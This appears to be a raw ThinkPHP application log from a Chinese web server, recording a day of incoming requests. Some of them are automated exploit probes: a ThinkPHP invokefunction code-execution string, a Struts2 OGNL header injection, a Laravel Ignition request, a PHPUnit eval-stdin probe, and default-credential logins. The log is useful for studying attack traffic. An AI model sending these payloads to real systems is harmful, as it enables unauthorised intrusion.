'connection' => 'keep-alive', 'referer' => 'http://47.105.33.115:80/admin/login.asp', 'upgrade-insecure-requests' => '1', ) [ info ] [ PARAM ] array ( 'username' => 'admin', 'psd' => 'Feefifofum', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:45:25+08:00 ] 128.14.134.134 GET / [ info ] 47.105.33.115/ [运行时间:0.030826s][吞吐率:32.44req/s] [内存消耗:3,333.41kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001252s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001584s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000097s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:48:28+08:00 ] 128.14.134.170 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030786s][吞吐率:32.48req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001302s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001583s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000116s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:48:35+08:00 ] 79.110.62.173 GET / [ info ] 47.105.33.115:80/ [运行时间:0.030232s][吞吐率:33.08req/s] [内存消耗:3,285.23kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000064s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001275s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Linux Gnu (cow)', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'accept-language' => 'en-GB,en;q=0.5', 'accept-encoding' => 'gzip, deflate', 'connection' => 'close', 'upgrade-insecure-requests' => '1', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001652s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000105s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:49:25+08:00 ] 41.250.143.196 GET / [ info ] 47.105.33.115:80/ [运行时间:0.031329s][吞吐率:31.92req/s] [内存消耗:3,332.86kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001218s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7', 'content-length' => '0', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001692s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000097s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:49:25+08:00 ] 41.250.143.196 GET / [ info ] 47.105.33.115:80/ [运行时间:0.042269s][吞吐率:23.66req/s] [内存消耗:3,332.60kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001118s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', 'content-length' => '0', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001886s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000097s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:49:25+08:00 ] 41.250.143.196 GET / [ info ] 47.105.33.115:80/ [运行时间:0.034726s][吞吐率:28.80req/s] [内存消耗:3,332.86kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001458s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7', 'content-length' => '0', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001732s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:53:07+08:00 ] 92.118.39.30 GET http://example.com/ [ info ] example.comhttp://example.com/ [运行时间:0.029999s][吞吐率:33.33req/s] [内存消耗:3,332.38kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001125s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'example.com', 'user-agent' => 'Go-http-client/1.1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001526s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000135s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T19:06:53+08:00 ] 34.126.116.141 POST /_ignition/execute-solution [ info ] 47.105.33.115:443/_ignition/execute-solution [运行时间:0.021185s][吞吐率:47.20req/s] [内存消耗:2,212.08kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001220s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '_ignition', 1 => 'execute-solution', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0', 'content-length' => '155', 'accept' => '*/*', 'accept-language' => 'en-US,en;q=0.5', 'connection' => 'close, close', 'content-type' => 'application/json', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( 'solution' => 'Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution', 'parameters' => array ( 'variableName' => 'username', 'viewFile' => '', ), ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T19:06:54+08:00 ] 34.126.116.141 GET / [ info ] 47.105.33.115:443/ [运行时间:0.029699s][吞吐率:33.67req/s] [内存消耗:3,285.38kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001185s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0', 'accept' => '*/*', 'accept-language' => 'en-US,en;q=0.5', 'connection' => 'close, close', 'content-type' => '%{#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'gu86f5du\',\'1\')}.multipart/form-data', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001672s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000102s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T19:06:54+08:00 ] 34.126.116.141 GET /script [ info ] 47.105.33.115:443/script [运行时间:0.021707s][吞吐率:46.07req/s] [内存消耗:2,208.81kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001265s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'script', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0', 'accept' => '*/*', 'accept-language' => 'en-US,en;q=0.5', 'connection' => 'close, close', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T19:06:54+08:00 ] 34.126.116.141 GET /login [ info ] 47.105.33.115:443/login [运行时间:0.020445s][吞吐率:48.91req/s] [内存消耗:2,208.77kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000063s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001395s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'login', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0', 'accept' => '*/*', 'accept-language' => 'en-US,en;q=0.5', 'connection' => 'close, close', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T19:06:55+08:00 ] 34.126.116.141 GET /jenkins/login [ info ] 47.105.33.115:443/jenkins/login [运行时间:0.020571s][吞吐率:48.61req/s] [内存消耗:2,208.93kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001149s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'jenkins', 1 => 'login', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0', 'accept' => '*/*', 'accept-language' => 'en-US,en;q=0.5', 'connection' => 'close, close', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T19:06:55+08:00 ] 34.126.116.141 GET /manager/html [ info ] 47.105.33.115:443/manager/html [运行时间:0.027741s][吞吐率:36.05req/s] [内存消耗:2,209.65kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000057s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001600s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'manager', 1 => 'html', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0', 'accept' => '*/*', 'accept-language' => 'en-US,en;q=0.5', 'authorization' => 'Basic OGhZVFNVRms6OGhZVFNVRms=', 'connection' => 'close, close', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T19:06:55+08:00 ] 34.126.116.141 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=gu86f5du [ info ] 47.105.33.115:443/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=gu86f5du [运行时间:0.020695s][吞吐率:48.32req/s] [内存消耗:2,210.44kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001173s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'Index', 1 => '\\think\\app', 2 => 'invokefunction', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0', 'accept' => '*/*', 'accept-language' => 'en-US,en;q=0.5', 'connection' => 'close, close', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( 'function' => 'call_user_func_array', 'vars' => array ( 0 => 'md5', 1 => array ( 0 => 'gu86f5du', ), ), ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T19:09:46+08:00 ] 163.123.143.71 POST /boaform/admin/formLogin [ info ] 47.105.33.115:80/boaform/admin/formLogin [运行时间:0.019548s][吞吐率:51.16req/s] [内存消耗:2,209.62kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001106s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'boaform', 1 => 'admin', 2 => 'formLogin', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept-language' => 'en-GB,en;q=0.5', 'accept-encoding' => 'gzip, deflate', 'content-type' => 'application/x-www-form-urlencoded', 'content-length' => '29', 'origin' => 'http://47.105.33.115:80', 'connection' => 'keep-alive', 'referer' => 'http://47.105.33.115:80/admin/login.asp', 'upgrade-insecure-requests' => '1', ) [ info ] [ PARAM ] array ( 'username' => 'admin', 'psd' => 'Feefifofum', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T20:49:08+08:00 ] 185.7.214.104 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [ info ] 47.105.33.115:443/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [运行时间:0.021332s][吞吐率:46.88req/s] [内存消耗:2,230.78kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001143s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'vendor', 1 => 'phpunit', 2 => 'phpunit', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'content-length' => '19', 'content-type' => 'application/x-www-form-urlencoded', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ' 'md5("phpunit")?>', 'src' => 'Util', 'PHP' => 'eval-stdin.php', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T21:27:36+08:00 ] 137.226.113.44 GET / [ info ] www.clcoa.com/ [运行时间:0.031212s][吞吐率:32.04req/s] [内存消耗:3,332.98kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000072s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001218s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'www.clcoa.com', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001833s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000121s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T21:51:18+08:00 ] 183.136.225.14 GET / [ info ] 47.105.33.115:80/ [运行时间:0.031015s][吞吐率:32.24req/s] [内存消耗:3,333.29kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001345s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0', 'accept' => '*/*', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001861s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000109s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T21:53:36+08:00 ] 192.241.219.75 GET /version [ info ] 47.105.33.115/version [运行时间:0.021621s][吞吐率:46.25req/s] [内存消耗:2,227.91kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001216s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'version', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 zgrab/0.x', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T22:18:17+08:00 ] 188.166.87.67 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.032434s][吞吐率:30.83req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001231s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Mobile Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001675s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000101s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T22:19:26+08:00 ] 218.11.13.77 GET / [ info ] www.clcoa.com/ [运行时间:0.029678s][吞吐率:33.70req/s] [内存消耗:3,333.04kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001170s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0', 'host' => 'www.clcoa.com', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001535s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000095s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T22:25:10+08:00 ] 54.36.148.71 GET /admin/index/login?url=%2F [ info ] www.clcoa.com/admin/index/login?url=%2F [运行时间:0.034234s][吞吐率:29.21req/s] [内存消耗:3,837.95kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001195s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'index', 2 => 'login', ), ) [ info ] [ HEADER ] array ( 'host' => 'www.clcoa.com', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'accept' => '*/*', 'accept-encoding' => 'deflate, gzip, br', ) [ info ] [ PARAM ] array ( 'url' => '/', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001654s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info 